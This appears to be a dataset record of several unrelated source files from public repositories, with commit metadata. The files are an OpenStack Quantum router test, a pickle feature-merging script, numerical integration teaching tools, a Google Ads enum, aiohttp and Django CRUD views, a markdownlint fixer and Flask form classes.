self._delete_resource_router_id_binding(context, id, model) if self._get_resource_router_id_binding(context, id, model): raise Exception("{0}-router binding is not deleted".format(res)) def create_pool(self, context, pool): return self.create_resource('pool', context, pool, lb_db.Pool) def get_pool(self, context, id, fields=None): return self.get_resource('pool', context, id, fields, lb_db.Pool) def delete_pool(self, context, id): return self.delete_resource('pool', context, id, lb_db.Pool) def create_health_monitor(self, context, health_monitor): return self.create_resource('health_monitor', context, health_monitor, lb_db.HealthMonitor) def get_health_monitor(self, context, id, fields=None): return self.get_resource('health_monitor', context, id, fields, lb_db.HealthMonitor) def delete_health_monitor(self, context, id): return self.delete_resource('health_monitor', context, id, lb_db.HealthMonitor) def create_vip(self, context, vip): return self.create_resource('vip', context, vip, lb_db.Vip) def get_vip(self, context, id, fields=None): return self.get_resource( 'vip', context, id, fields, lb_db.Vip) def delete_vip(self, context, id): return self.delete_resource('vip', context, id, lb_db.Vip) def stats(self, context, pool_id): pass class RouterServiceInsertionTestCase(unittest.TestCase): def setUp(self): plugin = ( "quantum.tests.unit.test_routerserviceinsertion." "RouterServiceInsertionTestPlugin" ) # point config file to: quantum/tests/etc/quantum.conf.test args = ['--config-file', test_api_v2.etcdir('quantum.conf.test')] config.parse(args=args) #just stubbing core plugin with LoadBalancer plugin cfg.CONF.set_override('core_plugin', plugin) cfg.CONF.set_override('service_plugins', [plugin]) cfg.CONF.set_override('quota_router', -1, group='QUOTAS') # Ensure 'stale' patched copies of the plugin are never returned quantum.manager.QuantumManager._instance = None # Ensure existing ExtensionManager is not used ext_mgr = extensions.PluginAwareExtensionManager( extensions_path, {constants.LOADBALANCER: RouterServiceInsertionTestPlugin()} ) extensions.PluginAwareExtensionManager._instance = ext_mgr router.APIRouter() app = config.load_paste_app('extensions_test_app') self._api = extensions.ExtensionMiddleware(app, ext_mgr=ext_mgr) self._tenant_id = "8c70909f-b081-452d-872b-df48e6c355d1" res = self._do_request('GET', _get_path('service-types')) self._service_type_id = res['service_types'][0]['id'] def tearDown(self): self._api = None cfg.CONF.reset() def _do_request(self, method, path, data=None, params=None, action=None): content_type = 'application/json' body = None if data is not None: # empty dict is valid body = wsgi.Serializer().serialize(data, content_type) req = testlib_api.create_request( path, body, content_type, method, query_string=params) res = req.get_response(self._api) if res.status_code >= 400: raise webexc.HTTPClientError(detail=res.body, code=res.status_code) if res.status_code != webexc.HTTPNoContent.code: return res.json def _router_create(self, service_type_id=None): data = { "router": { "tenant_id": self._tenant_id, "name": "test", "admin_state_up": True, "service_type_id": service_type_id, } } res = self._do_request('POST', _get_path('routers'), data) return res['router'] def test_router_create_no_service_type_id(self): router = self._router_create() self.assertEqual(router.get('service_type_id'), None) def test_router_create_with_service_type_id(self): router = self._router_create(self._service_type_id) self.assertEqual(router['service_type_id'], self._service_type_id) def test_router_get(self): router = self._router_create(self._service_type_id) res = self._do_request('GET', _get_path('routers/{0}'.format(router['id']))) self.assertEqual(res['router']['service_type_id'], self._service_type_id) def _test_router_update(self, update_service_type_id): router = self._router_create(self._service_type_id) router_id = router['id'] new_name = _uuid() data = { "router": { "name": new_name, "admin_state_up": router['admin_state_up'], } } if update_service_type_id: data["router"]["service_type_id"] = _uuid() with self.assertRaises(webexc.HTTPClientError) as ctx_manager: res = self._do_request( 'PUT', _get_path('routers/{0}'.format(router_id)), data) self.assertEqual(ctx_manager.exception.code, 400) else: res = self._do_request( 'PUT', _get_path('routers/{0}'.format(router_id)), data) res = self._do_request( 'GET', _get_path('routers/{0}'.format(router['id']))) self.assertEqual(res['router']['name'], new_name) def test_router_update_with_service_type_id(self): self._test_router_update(True) def test_router_update_without_service_type_id(self): self._test_router_update(False) def test_router_delete(self): router = self._router_create(self._service_type_id) self._do_request( 'DELETE', _get_path('routers/{0}'.format(router['id']))) def _test_lb_setup(self): self._subnet_id = _uuid() router = self._router_create(self._service_type_id) self._router_id = router['id'] def _test_pool_setup(self): self._test_lb_setup() def _test_health_monitor_setup(self): self._test_lb_setup() def _test_vip_setup(self): self._test_pool_setup() pool = self._pool_create(self._router_id) self._pool_id = pool['id'] def _create_resource(self, res, data): resp = self._do_request('POST', _get_path('lb/{0}s'.format(res)), data) return resp[res] def _pool_create(self, router_id=None): data = { "pool": { "tenant_id": self._tenant_id, "name": "test", "protocol": "HTTP", "subnet_id": self._subnet_id, "lb_method": "ROUND_ROBIN", "router_id": router_id } } return self._create_resource('pool', data) def _pool_update_attrs(self, pool): uattr = {} fields = [ 'name', 'description', 'lb_method', 'health_monitors', 'admin_state_up' ] for field in fields: uattr[field] = pool[field] return uattr def _health_monitor_create(self, router_id=None): data = { "health_monitor": { "tenant_id": self._tenant_id, "type": "HTTP", "delay": 1, "timeout": 1, "max_retries": 1, "router_id": router_id } } return self._create_resource('health_monitor', data) def _health_monitor_update_attrs(self, hm): uattr = {} fields = ['delay', 'timeout', 'max_retries'] for field in fields: uattr[field] = hm[field] return uattr def _vip_create(self, router_id=None): data = { "vip": { "tenant_id": self._tenant_id, "name": "test", "protocol": "HTTP", "port": 80, "subnet_id": self._subnet_id, "pool_id": self._pool_id, "address": "192.168.1.101", "connection_limit": 100, "admin_state_up": True, "router_id": router_id } } return self._create_resource('vip', data) def _vip_update_attrs(self, vip): uattr = {} fields = [ 'name', 'description', 'pool_id', 'connection_limit', 'admin_state_up' ] for field in fields: uattr[field] = vip[field] return uattr def _test_resource_create(self, res): getattr(self, "_test_{0}_setup".format(res))() obj = getattr(self, "_{0}_create".format(res))() obj = getattr(self, "_{0}_create".format(res))(self._router_id) self.assertEqual(obj['router_id'], self._router_id) def _test_resource_update(self, res, update_router_id, update_attr, update_value): getattr(self, "_test_{0}_setup".format(res))() obj = getattr(self, "_{0}_create".format(res))(self._router_id) uattrs = getattr(self, "_{0}_update_attrs".format(res))(obj) uattrs[update_attr] = update_value data = {res: uattrs} if update_router_id: uattrs['router_id'] = self._router_id with self.assertRaises(webexc.HTTPClientError) as ctx_manager: newobj = self._do_request( 'PUT', _get_path('lb/{0}s/{1}'.format(res, obj['id'])), data) self.assertEqual(ctx_manager.exception.code, 400) else: newobj = self._do_request( 'PUT', _get_path('lb/{0}s/{1}'.format(res, obj['id'])), data) updated = self._do_request( 'GET', _get_path('lb/{0}s/{1}'.format(res, obj['id']))) self.assertEqual(updated[res][update_attr], update_value) def _test_resource_delete(self, res): getattr(self, "_test_{0}_setup".format(res))() obj = getattr(self, "_{0}_create".format(res))() self._do_request( 'DELETE', _get_path('lb/{0}s/{1}'.format(res, obj['id']))) obj = getattr(self, "_{0}_create".format(res))(self._router_id) self._do_request( 'DELETE', _get_path('lb/{0}s/{1}'.format(res, obj['id']))) def test_pool_create(self): self._test_resource_create('pool') def test_pool_update_with_router_id(self): self._test_resource_update('pool', True, 'name', _uuid()) def test_pool_update_without_router_id(self): self._test_resource_update('pool', False, 'name', _uuid()) def test_pool_delete(self): self._test_resource_delete('pool') def test_health_monitor_create(self): self._test_resource_create('health_monitor') def test_health_monitor_update_with_router_id(self): self._test_resource_update('health_monitor', True, 'timeout', 2) def test_health_monitor_update_without_router_id(self): self._test_resource_update('health_monitor', False, 'timeout', 2) def test_health_monitor_delete(self): self._test_resource_delete('health_monitor') def test_vip_create(self): self._test_resource_create('vip') def test_vip_update_with_router_id(self): self._test_resource_update('vip', True, 'name', _uuid()) def test_vip_update_without_router_id(self): self._test_resource_update('vip', False, 'name', _uuid()) def test_vip_delete(self): self._test_resource_delete('vip')
[ "fank@vmware.com" ]
fank@vmware.com
d30b2d899932c4a3c83284b2c6de91a631b995de
7f52cfb2fb4f09a14ada450862bab25af19cb151
/merge_data.py
5b5b6fcc24e023f854acf30ff74bba31ba11acc2
[]
no_license
shahumang19/Periocular-Recognition
e63d33e3c3393ba42f9342f6ed0729b1595aedfd
640b82d31dc79e7bbb46c88433c6561c0f011fa5
refs/heads/master
2022-12-17T23:04:33.959009
2020-08-11T06:59:50
2020-08-11T06:59:50
285,555,399
2
0
null
null
null
null
UTF-8
Python
false
false
735
py
import os, pickle import numpy as np F1 = "data\\leye_features1.pkl" F2 = "data\\leye_features2.pkl" F3 = "data\\reye_features1.pkl" F4 = "data\\reye_features2.pkl" FILES = [F1, F2, F3, F4] features, labels = None, None for file1 in FILES: with open(file1, "rb") as f1: data = pickle.load(f1) if features is None: features = data["features"] labels = data["labels"] else: features = np.append(features, data["features"], axis=0) labels = labels + data["labels"] print(features.shape) print(len(labels)) fn = "data\\merged_features.pkl" with open(fn, "wb") as fl: pickle.dump({"features": features, "labels": labels}, fl) print(f"{fn} saved...")
[ "shahumang19@gmail.com" ]
shahumang19@gmail.com
c45249ab30242a6a3642d0f3e42f0ce53576fc53
22d8b1250e0b5178e03ff4843e1f79243d35821e
/areaTools.py
0f984d5166bd8f3ce473a566711fdfec02894819
[]
no_license
kmcquighan/Calc-II-Numerical-Methods
98350b76973cf44d481353cfc981efc8b6875a9c
d22a4eabd327f516308093ffa93701de2bdf8042
refs/heads/master
2020-05-27T21:10:54.887481
2017-03-24T15:42:07
2017-03-24T15:42:07
83,606,852
1
2
null
null
null
null
UTF-8
Python
false
false
12,176
py
# -*- coding: utf-8 -*- """ by Kelly McQuighan 2017 These tools can be used to visualize different numerical integration schemes, and to compute the associated error. They can also be used to find the order of various numerical schemes. """ from matplotlib import pyplot as plt from numpy import * import numpy as np import scipy.integrate as inte import scipy.interpolate as interp import matplotlib as mpl mpl.rcParams['font.size'] = 17 colors = ['#0058AF','#FF8000','#D682FF','#00693C','#E02102'] styles = ['-',':','-',':','-'] """ This function is used to make the plot of what the approximation of the integral looks like for five different numerical methods: Left Riemann sum, Right Riemann sum, Midpoint rule, Trapezoid rule, and Simpson's rule. """ def plots(func, a,b,n,method,ax): ax.axvline(0.,color='#666666',linewidth=1) ax.axhline(0.,color='#666666',linewidth=1) if (a>0): xlarge = np.linspace(0.,1.1*b,1000) elif (b<0): xlarge = np.linspace(1.1*a,0.,1000) else: xlarge = np.linspace(1.1*a,1.1*b,1000) flarge = func(xlarge) ax.plot(xlarge,flarge,'b', linewidth=5) ax.set_xlim([xlarge[0], xlarge[999]]) smallest = np.min(flarge) largest = np.max(flarge) dx = (b-a)/n xs = np.linspace(a,b,n+1) fxs = func(xs) if method.lower()=='left': for i in range(n): points = [[xs[i], 0], [xs[i], fxs[i]], [xs[i+1], fxs[i]], [xs[i+1],0]] poly = plt.Polygon(points, fc='g', edgecolor='g', alpha=0.3, linewidth=3) ax.add_patch(poly) elif method.lower()=='right': for i in range(n): points = [[xs[i], 0], [xs[i], fxs[i+1]], [xs[i+1], fxs[i+1]], [xs[i+1],0]] poly = plt.Polygon(points, fc='g', edgecolor='g', alpha=0.3, linewidth=3) ax.add_patch(poly) elif method.lower()=='midpoint': x = np.linspace(a+dx/2.,b-dx/2.,n) fx = func(x) for i in range(n): points = [[xs[i], 0], [xs[i], fx[i]], [xs[i+1], fx[i]], [xs[i+1],0]] poly = plt.Polygon(points, fc='g', edgecolor='g', alpha=0.3, linewidth=3) ax.add_patch(poly) elif method.lower()=='trapezoid': for i in range(n): points = [[xs[i], 0], [xs[i], fxs[i]], [xs[i+1], fxs[i+1]], [xs[i+1],0]] poly = plt.Polygon(points, fc='g', edgecolor='g', alpha=0.3, linewidth=3) ax.add_patch(poly) elif method.lower()=='simpson': # note: this implementation keeps the number of grid points the same for i in range(0,n,2): lag = interp.lagrange([xs[i], xs[i+1], xs[i+2]], [fxs[i], fxs[i+1], fxs[i+2]]) section = np.linspace(xs[i], xs[i+2], 100) fsec = lag(section) ax.fill_between(section,fsec, facecolor='g', edgecolor='g', alpha=0.3, linewidth=3) x_mid = np.linspace(a+dx,b-dx,n/2) vert = np.ones(100) for the_x in x_mid: ax.plot(the_x*vert,np.linspace(0,func(the_x),100),'g--', linewidth=3, alpha=0.5) else: print ('ERROR: You have not specified a valid method. Please check for typos.') if smallest>0: ax.set_ylim([0,1.1*largest]) elif largest<0: ax.set_ylim([1.1*smallest,0]) else: ax.set_ylim([1.1*smallest, 1.1*largest]) ax.set_xlabel('x') ax.set_ylabel('f(x)') """ This function is used to make the plot of what the approximation of the integral looks like for all five different numerical methods: Left Riemann sum, Right Riemann sum, Midpoint rule, Trapezoid rule, and Simpson's rule. It also makes a bar chart showing the size of the error for each method so that the user can quickly see which method is better for a specific fixed value of n. """ def plotArea(f,a,b,n): a = eval(a) b = eval(b) if n<1: n=1 print ('ERROR: n must be greater than zero. setting n=1.') func = eval("lambda x: " + f) I = inte.quad(func, a, b)[0] fig = plt.figure(figsize=(15, 6)) ax1 = fig.add_subplot(2,3,1) ax2 = fig.add_subplot(2,3,2) ax3 = fig.add_subplot(2,3,3) ax4 = fig.add_subplot(2,3,4) ax5 = fig.add_subplot(2,3,5) ax6 = fig.add_subplot(2,3,6) plots(func,a,b,n,"left",ax1) plots(func,a,b,n,"right",ax2) plots(func,a,b,n,"midpoint",ax3) plots(func,a,b,n,"trapezoid",ax4) plots(func,a,b,n,"simpson",ax5) area1 = evalArea(func,a,b,n,"left") area2 = evalArea(func,a,b,n,"right") area3 = evalArea(func,a,b,n,"midpoint") area4 = evalArea(func,a,b,n,"trapezoid") area5 = evalArea(func,a,b,n,"simpson") err1 = np.abs(area1-I) err2 = np.abs(area2-I) err3 = np.abs(area3-I) err4 = np.abs(area4-I) err5 = np.abs(area5-I) if (not check_error(err1)): err1=0; if (not check_error(err2)): err2=0; if (not check_error(err3)): err3=0; if (not check_error(err4)): err4=0; if (not check_error(err5)): err5=0; ax6.bar(range(5),[err1,err2,err3,err4,err5]) ax6.set_xticks(range(5)) ax6.set_xticklabels(['left','right','mid','trap','Simp'],rotation=70) ax6.axhline(0,color='k',linewidth=1) plt.tight_layout(pad=0.4, w_pad=0.5, h_pad=5.5) plt.suptitle('f(x) = '+f+', Area = %.3f, n=%d' %(I,n), fontsize=20, y=1.2) ax1.set_title('Method "Left"\n Approximate area:%.5f \n Absolute error: %.2e' %(area1, err1)) ax2.set_title('Method "Right"\n Approximate area:%.5f \n Absolute error: %.2e' %(area2, err2)) ax3.set_title('Method "Midpoint"\n Approximate area:%.5f \n Absolute error: %.2e' %(area3, err3)) ax4.set_title('Method "Trapezoid"\n Approximate area:%.5f \n Absolute error: %.2e' %(area4, err4)) ax5.set_title('Method "Simpson"\n Approximate area:%.5f \n Absolute error: %.2e' %(area5, err5)) ax6.set_title('Absolute error for each method\n') plt.show() """ This method plots the approximation three times, each time doubling the number of gridpoints used in the approximation. It also computes and outputs how the error decreases. """ def plot3Areas(f,a,b,n,method): a = eval(a) b=eval(b) func = eval("lambda x: " + f) I = inte.quad(func, a, b)[0] plt.figure(figsize=(15, 4)) ax1 = plt.subplot2grid((4,3), (0, 0),rowspan=3) ax2 = plt.subplot2grid((4,3), (0, 1),rowspan=3) ax3 = plt.subplot2grid((4,3), (0, 2),rowspan=3) ax0 = plt.subplot2grid((4,3),(3,0),colspan=3) ax0.axis('off') plots(func,a,b,n,method,ax1) plots(func,a,b,2*n,method,ax2) plots(func,a,b,4*n,method,ax3) area1 = evalArea(func,a,b,n,method) area2 = evalArea(func,a,b,2*n,method) area3 = evalArea(func,a,b,4*n,method) err1 = np.abs(area1-I) err2 = np.abs(area2-I) err3 = np.abs(area3-I) plt.tight_layout(pad=0.4, w_pad=0.5, h_pad=1.0) plt.suptitle('f(x) = '+f+', Method: '+method+', Area = %.3f' %I, fontsize=20, y=1.4) ax1.set_title('n=%d \n Approximate area:%.5f \n Absolute error: %.2e' %(n,area1, err1)) ax2.set_title('n=%d \n Approximate area:%.5f \n Absolute error: %.2e' %(2*n,area2, err2)) ax3.set_title('n=%d \n Approximate area:%.5f \n Absolute error: %.2e' %(4*n,area3, err3)) if (not check_error(err1)): ax0.text('Using method '+method+' to find the area under f(x) = '+f+' returns no errors, so it does not make sense to compare the errors for different numbers of sub-intervals.', ha='left', va='top', fontsize=20, transform=ax0.transAxes) else: ax0.text(0.0, 1., 'When using method '+method+' to compute the area under f(x) = '+f+':\n'+ '- In doubling the number of subintervals from n=%d to n=%d the error was decreased by a factor of %.2f\n' %(n, 2*n,err1/err2)+ '- In doubling the number of subintervals from n=%d to n=%d the error was decreased by a factor of %.2f' %(2*n, 4*n,err2/err3), ha='left', va='top', fontsize=20, transform=ax0.transAxes) plt.show() """ This method is currently unused by the Notebook because it refreshes in an awkward way. Instead plot one method at a time using plot3Areas and a Dropdown box for the method type. """ def plotAllMethods(f,a,b,n): a = eval(a) b=float(b) if n<1: n=1 print ('ERROR: n must be greater than zero. setting n=1.') plot3Areas(f,a,b,n,"left") plot3Areas(f,a,b,n,"right") plot3Areas(f,a,b,n,"midpoint") plot3Areas(f,a,b,n,"trapezoid") plot3Areas(f,a,b,n,"simpson") plt.show() """ This function approximates the integral using one of five possible numerical methods: Left Riemann sum, Right Riemann sum, Midpoint Rule, Trapezoid Rule, and Simpson's Rule. """ def evalArea(func,a,b,n, method): dx = (b-a)/n if method.lower()=='left': x = np.linspace(a,b-dx,n) fx = func(x) area = np.sum(fx)*dx elif method.lower()=='right': x = np.linspace(a+dx,b,n) fx = func(x) area = np.sum(fx)*dx elif method.lower()=='midpoint': x = np.linspace(a+dx/2.,b-dx/2.,n) fx = func(x) area = np.sum(fx)*dx elif method.lower()=='trapezoid': x = np.linspace(a+dx,b-dx,n-1) fx = func(x) area = dx*(0.5*func(a)+0.5*func(b)+np.sum(fx)) elif method.lower()=='simpson': x_mid = np.linspace(a+dx,b-dx,n/2) x_trap = np.linspace(a+2*dx,b-2*dx,n/2-1) fx_mid = func(x_mid) fx_trap = func(x_trap) area = dx/3.*(4*np.sum(fx_mid)+func(a)+func(b)+2*np.sum(fx_trap)) else: print ('ERROR: You have not specified a valid method. Please check for typos.') return area """ Checks if the error is near machine precision. If so it does not make sense to compare how the error decreases as teh gridsizes increase. For example, evaluating a constant function using any of the methods will be exact, so the error should be machine precision. """ def check_error(err): epsilon = 7./3 - 4./3 -1 return (err>100*epsilon) """ This function compares all five methods by making a log-log plot of the error. The slope of each curve is computed and can be used to determine the order of each numerical method. """ def compareMethods(f,a,b): n = 8 a = eval(a) b=float(b) if n<1: n=1 print ('ERROR: n must be greater than zero. setting n=1.') func = eval("lambda x: " + f) I = inte.quad(func, a, b)[0] n = int(n) if n<1: n=1 errors = np.ones((5,6)) # methods in rows, errors in columns ns = np.zeros((6)) for i in range(6): errors[0,i] = np.abs(I-evalArea(func, a,b,2**i*n, 'left')) errors[1,i] = np.abs(I-evalArea(func, a,b,2**i*n, 'right')) errors[2,i] = np.abs(I-evalArea(func, a,b,2**i*n, 'midpoint')) errors[3,i] = np.abs(I-evalArea(func, a,b,2**i*n, 'trapezoid')) errors[4,i] = np.abs(I-evalArea(func, a,b,2**i*n, 'simpson')) ns[i] = i fig = plt.figure(figsize=(10,5)) ax = fig.gca() ax.set_xlabel(r'$\log_2(n/4)$') ax.set_ylabel(r'$\log_2(error_i/error_1)$') ax.set_title('log-log plot of the error versus the number of subintervals.\n f(x) = ' + f) labels = ['Left Riemann', 'Right Riemann', 'Midpoint', 'Trapezoid','Simpson'] for i in range(5): if check_error(errors[i,0]): log_errors = np.log(errors[i,:] / errors[i,0])/np.log(2) plt.plot(ns, log_errors,linewidth=6,color=colors[i],linestyle=styles[i],label=labels[i]) poly1 = np.polyfit(ns, log_errors, 1) print ('Using method '+labels[i]+' the slope of the log-log plot is %.2f' %poly1[0]) else: print (r'Using method '+labels[i]+' the errors are less than machine precision for n=8 already!') plt.legend(loc=3) plt.axhline(0.0,0,5,color='k',linewidth=1) ax.set_xlim([0,5]) plt.show()
[ "noreply@github.com" ]
noreply@github.com
c2191030e2543c62287b31ad7e253f8767252f1c
9ae6ce54bf9a2a86201961fdbd5e7b0ec913ff56
/google/ads/googleads/v9/enums/types/feed_item_quality_approval_status.py
2b7fc3c81f16e8f0168b1a99e3484c10977c937b
[ "Apache-2.0" ]
permissive
GerhardusM/google-ads-python
73b275a06e5401e6b951a6cd99af98c247e34aa3
676ac5fcb5bec0d9b5897f4c950049dac5647555
refs/heads/master
2022-07-06T19:05:50.932553
2022-06-17T20:41:17
2022-06-17T20:41:17
207,535,443
0
0
Apache-2.0
2019-09-10T10:58:55
2019-09-10T10:58:55
null
UTF-8
Python
false
false
1,260
py
# -*- coding: utf-8 -*- # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import proto # type: ignore __protobuf__ = proto.module( package="google.ads.googleads.v9.enums", marshal="google.ads.googleads.v9", manifest={"FeedItemQualityApprovalStatusEnum",}, ) class FeedItemQualityApprovalStatusEnum(proto.Message): r"""Container for enum describing possible quality evaluation approval statuses of a feed item. """ class FeedItemQualityApprovalStatus(proto.Enum): r"""The possible quality evaluation approval statuses of a feed item. """ UNSPECIFIED = 0 UNKNOWN = 1 APPROVED = 2 DISAPPROVED = 3 __all__ = tuple(sorted(__protobuf__.manifest))
[ "noreply@github.com" ]
noreply@github.com
cfdbb2f58717e16d81d08e87d8d9d40cf2a66e9c
a8e5e85cd1d3210f3e404faa35654e02ba52a7af
/py作业/serv/course_actions.py
a7d8fdd99701f1c1546574c2baed2d51e36addc4
[]
no_license
Lizhupu-0802/gradesystem
6b56299642d819139bc3a3c9415adbc764cd89d5
9c57d112fb840379a91236a278fcbe829609ec61
refs/heads/main
2023-02-01T21:44:59.597086
2020-12-19T05:47:44
2020-12-19T05:47:44
321,072,394
0
0
null
null
null
null
UTF-8
Python
false
false
2,308
py
from aiohttp import web import psycopg2.errors from urllib.parse import urlencode from .config import db_block, web_routes @web_routes.post('/action/course/add') async def action_course_add(request): params = await request.post() param_fields = ['no', 'name', 'score', 'attr', ] param_values = {field: params.get(field) for field in param_fields} for field, value in param_values.items(): if value is None: return web.HTTPBadRequest(text=f"{field} must be required") try: with db_block() as db: db.execute(""" INSERT INTO course (no, name, score, attr) VALUES ( %(no)s, %(name)s, %(score)s, %(attr)s) """, param_values) except psycopg2.errors.UniqueViolation: query = urlencode({ "message": "已经添加该课程号课程", "return": "/course" }) return web.HTTPFound(location=f"/error?{query}") return web.HTTPFound(location="/course") @web_routes.post('/action/course/edit/{sn}') async def edit_course_action(request): sn = request.match_info.get("sn") if sn is None: return web.HTTPBadRequest(text="sn, must be required") params = await request.post() param_fields = ['no', 'name', 'score', 'attr', ] param_values = {field: params.get(field) for field in param_fields} for field, value in param_values.items(): if value is None: return web.HTTPBadRequest(text=f"{field} must be required") try: param_values['sn'] = int(sn) param_values['score'] = int(param_values['score']) except ValueError: return web.HTTPBadRequest(text="invalid value") with db_block() as db: db.execute(""" UPDATE course SET no=%(no)s, name=%(name)s, score=%(score)s, attr=%(attr)s WHERE sn = %(sn)s """, param_values) return web.HTTPFound(location="/course") @web_routes.post('/action/course/delete/{sn}') def delete_course_action(request): sn = request.match_info.get("sn") if sn is None: return web.HTTPBadRequest(text="sn must be required") with db_block() as db: db.execute(""" DELETE FROM course WHERE sn = %(sn)s """, dict(sn=sn)) return web.HTTPFound(location="/course")
[ "noreply@github.com" ]
noreply@github.com
7824a3129a4b0602e416b5f8eb4533f577abb87f
74b2f9658f3fd47aaf255febf2852263c6ec19e0
/takerest/src/helpers/test-data-gen/src/lib/vendors/pairs/main/pairwisepy/__init__.py
388cb2859d0ac5d57e2ce7a71e3661e25c431ed3
[]
no_license
upworka0/restio
bf47db136e884c72b061962e3973546a4bdd78c7
9f22fc6513fefd6c98738b0ea016abfec7c437cb
refs/heads/master
2023-03-05T00:23:12.243382
2021-10-01T01:49:01
2021-10-01T01:49:01
203,429,128
1
0
null
2023-03-01T19:12:22
2019-08-20T18:07:32
JavaScript
UTF-8
Python
false
false
65
py
# Author: Nagaraj # Date: 6/5/18 from .pairwise import AllPairs
[ "upworka0@gmail.com" ]
upworka0@gmail.com
c1a8889953ba8a96272a8c3b6ed202d72807d980
53365da025bf6a2b0b9dda4554836836409f65fc
/django_fullstack/semi_restful_tv_shows/main/views.py
6a2ecdecc361fa3dee8684b594a136391e8c51fb
[]
no_license
jdinthetrees/pythonstack
d837d2cc173cd3f3a3bf6daf984ae0672d7f86e4
e41ac65ea34a0296260b338d3928f1d81b3725a7
refs/heads/master
2023-02-12T06:45:18.486565
2021-01-12T21:24:41
2021-01-12T21:24:41
329,112,787
0
0
null
null
null
null
UTF-8
Python
false
false
2,307
py
from django.shortcuts import render, HttpResponse, redirect from django.contrib import messages from .models import Show def index(request): print(Show.objects.get(id=6).__dict__) for show in Show.objects.all(): context = { 'all_the_shows': Show.objects.all(), } return render(request, "index.html", context) def showdescription(request, show_id): context = { 'this_show': Show.objects.get(id=show_id), } return render(request, "showdescription.html", context) def showedit(request, show_id): context = { 'this_show': Show.objects.get(id=show_id), } return render(request, "showedit.html", context) def showupdate(request, show_id): errs = Show.objects.show_validator(request.POST) if len(errs) > 0: for msg in errs.values(): messages.error(request, msg) # for key, value in errs.items(): # messages.error(request, msg) return redirect(f"/shows/{request.POST['this_show.id']}/edit") else: one_show = Show.objects.get(id=request.POST['this_show.id']) one_show.title = request.POST['title'] one_show.network = request.POST['network'] one_show.description = request.POST['description'] one_show.save() return redirect(f"/shows/{request.POST['this_show.id']}") def showdelete(request, show_id): context = { 'this_show': Show.objects.get(id=show_id), } one_show = Show.objects.get(id=request.POST['this_show.id']) one_show.delete() return redirect("/shows") def shownew(request): return render(request, "showadd.html") def showadd(request): print(request.POST) errs = Show.objects.show_validator(request.POST) if len(errs) > 0: for msg in errs.values(): messages.error(request, msg) # for key, value in errs.items(): # messages.error(request, msg) return redirect(f"/shows/new") else: Show.objects.create( title=request.POST['title'], network = request.POST['network'], release_date = request.POST['release_date'], description = request.POST['description'], ) last_show = Show.objects.last().id return redirect(f"/shows/{last_show}") # Create your views here.
[ "jollyjohndang@gmail.com" ]
jollyjohndang@gmail.com
8986dc358b507dacb7c4a4416d0697035d394d40
9c51b666e9c6db491af0fe67b58dd1335f77088e
/tools/markdownlint-fixer.py
05d0e8bcb4f9d491480e15c28ff52a5a5084255f
[ "CC-BY-4.0" ]
permissive
undergroundwires/Azure-in-bullet-points
aa15ee480d6fe5a7f057fda03e454e70e5118154
9743b1d81a49fa7c28d93a4ced21db30cef28765
refs/heads/master
2023-08-31T23:38:30.500859
2023-08-18T13:41:37
2023-08-18T13:41:37
175,283,225
1,052
470
CC-BY-4.0
2023-08-18T13:41:39
2019-03-12T19:31:20
Python
UTF-8
Python
false
false
2,781
py
''' Not tested for generic usage. It fixes following lint issues in md files: MD007 - Unordered list indentation MD009 - No trailing whitespaces MD004 - Unordered list style MD002 - Headings should be surruonded by blank lines ''' import math, os.path, sys, argparse parser = argparse.ArgumentParser(description="markdownlint fixer") parser.add_argument('-i', help='File to fix', dest='filename', type=argparse.FileType('r', encoding='UTF-8'), required=True) args = parser.parse_args() path = str(args.filename.name) new_lines = [] def count_leading_whitespaces(text): return len(text) - len(text.lstrip(' ')) with open(path, 'r', encoding = 'UTF-8') as file: lines = file.readlines() for line_index, line in enumerate(lines): # Ensure 2 whitespaces are used instead of tabs (MD007 - Unordered list indentation) if line.startswith(' '): total_white_spaces = count_leading_whitespaces(line) line = line.lstrip(' ') total_white_spaces = total_white_spaces / 2 if int(total_white_spaces) != total_white_spaces: normalized = math.ceil(total_white_spaces) print(f'Bad total white spaces: {str(total_white_spaces)} normalized to {str(normalized)}. Line: "{line}"') total_white_spaces = normalized total_white_spaces = int(total_white_spaces) for i in range(total_white_spaces): line = ' ' + line # Fix MD009 - No trailing whitespaces text_part = line.split('\n')[0].rstrip(' ') if line.endswith('\n'): line = f'{text_part}\n' else: line = f'{text_part}' # MD004 - Unordered list style if line.lstrip().startswith('-'): total_white_spaces = 0 while line.startswith(' '): total_white_spaces += 1 line = line[1:len(line)] line = "*" + line[1:len(line)] while total_white_spaces != 0: line = ' ' + line total_white_spaces -= 1 # MD002 - Headings should be surruonded by blank lines if line_index < len(lines) - 1: next_line = lines[line_index + 1].lstrip(' ') if next_line.startswith('#') and line != '\n': line = f'{line}\n' else: if line.lstrip().startswith("#") and next_line != '\n': line = f'{line}\n' new_lines.append(line) filename, file_extension = os.path.splitext(path) output_path = f'{filename}_fixed{file_extension}' with open(output_path, 'w', encoding='UTF-8') as fixed_file: fixed_file.writelines(new_lines)
[ "undergroundwires@users.noreply.github.com" ]
undergroundwires@users.noreply.github.com
4c9659fd162014d48f2f652a5dcc598705d45fbb
3c56f54ec7e6cade93b5c988cba531e8a2edd453
/Day5/SF21-Flask-Advanced/wtforms/forms.py
51a054063629ee6fc5e406bb584f9f4a84aca901
[ "MIT" ]
permissive
JuJu2181/Learning_Flask
ae6addeedea29df0d19ed272d68f37d945bda6e4
f9f46cac743323a1821ed214dd512ef337a804f1
refs/heads/master
2023-08-25T21:44:41.931317
2021-07-15T07:55:07
2021-07-15T07:55:07
383,996,071
0
0
null
null
null
null
UTF-8
Python
false
false
646
py
from flask_wtf import FlaskForm from wtforms import IntegerField, StringField, SubmitField from wtforms.validators import InputRequired, NumberRange class NameForm(FlaskForm): name = StringField("Full Name",validators=[InputRequired("Please Add a Name")]) # add validation here submit = SubmitField("Submit") class NameFormSecond(FlaskForm): name = StringField("Full Name", validators=[InputRequired()]) age = IntegerField( "Age", validators=[ InputRequired(), NumberRange(min=13, max=60, message="Age must be between 13 and 60."), ], ) submit = SubmitField("Submit")
[ "anishshilpakar8@gmail.com" ]
anishshilpakar8@gmail.com
7046f96277b3a24fa4c120d9e42ebb229ccaad4a
fe7763e194be94c402482619c0111fcaca1ef7f6
